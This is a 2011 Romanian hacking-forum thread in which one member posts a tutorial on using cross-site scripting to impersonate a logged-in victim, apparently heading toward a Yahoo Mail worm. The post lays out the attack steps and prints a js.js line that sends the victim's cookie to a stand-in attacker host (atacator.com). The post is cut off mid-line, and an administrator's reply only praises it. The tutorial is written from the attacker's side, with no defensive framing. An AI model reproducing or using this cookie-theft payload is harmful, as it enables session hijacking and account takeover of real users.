RNHC Center.
Buna sunt Genius + +, aş dori să ştiu dacă vă puteţi înregistra pe acest site
RNHC Center.
Buna sunt Genius + +, aş dori să ştiu dacă vă puteţi înregistra pe acest site
RNHC Center.
Doriți să reacționați la acest mesaj? Creați un cont în câteva clickuri sau conectați-vă pentru a continua.
RNHC Center.


 
AcasaAcasa  GalerieGalerie  Ultimele imaginiUltimele imagini  CăutareCăutare  ÎnregistrareÎnregistrare  Conectare  

 

 atacul-xss-impersonare-vierme-yahoo-mail

In jos 
2 participanți
AutorMesaj
nike01
Membru
Membru
nike01


Mesaje : 12
Data de inscriere : 07/09/2011
Varsta : 31
Localizare : Bucuresti

atacul-xss-impersonare-vierme-yahoo-mail Empty
MesajSubiect: atacul-xss-impersonare-vierme-yahoo-mail   atacul-xss-impersonare-vierme-yahoo-mail EmptyDum Oct 30, 2011 3:01 am

PARTEA 1: Descriere

Folosind atacuri Cross Site Scripting(XSS) devine posibila impersonarea unui utilizator
legitim(victima) care este autentificata pe un website(tinta)

In acest document vom presupune ca site-ul tinta are o vulnerabilitate XSS
care ii permite unui atacator sa injecteze cod rau intentionat intr-o pagina.


Aceasta este secventa de pasi implicate in acest tip de atac


1. Victima se autentifica pe site-ul tinta
2. Atacatorul ii trimite victimei un link spre o pagina(continand cod rau intentionat)
de pe site-ul tinta
3. Victima navigheaza catre pagina
4. Codul continut in acea pagina incarca un script din alta locatie trimitand spre
acesta si cookiul victimei
5. Scriptul foloseste acest cookie pozand drept victima pe site-ul tinta


Exemplificare:

Presupunem ca victima este deja autentificata pe site-ul tinta

Tinta are o vulnerabilitate XSS de forma [Trebuie sa fiti inscris si conectat pentru a vedea acest link]

Atacatorul ii trimite victime link-ul
"http://www.tinta.com/pagina.php?var="

Atuncti cand victima urmeaza linkul scriptul "js.js" este incarcat si executat de browserul acestuia

===== js.js =====

new Image().src='http://www.atacator.com/php.php?cookie= '+escape(document
Sus In jos
Genius++
Administrator
Administrator
Genius++


Mesaje : 527
Data de inscriere : 26/08/2011
Varsta : 27
Localizare : Bacau

atacul-xss-impersonare-vierme-yahoo-mail Empty
MesajSubiect: Re: atacul-xss-impersonare-vierme-yahoo-mail   atacul-xss-impersonare-vierme-yahoo-mail EmptyDum Oct 30, 2011 3:24 am

gj nike01
Sus In jos
https://rnhc.forumgratuit.ro/
 
atacul-xss-impersonare-vierme-yahoo-mail
Sus 
Pagina 1 din 1

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
RNHC Center. :: IT :: Informati/Tutoriale-
Mergi direct la: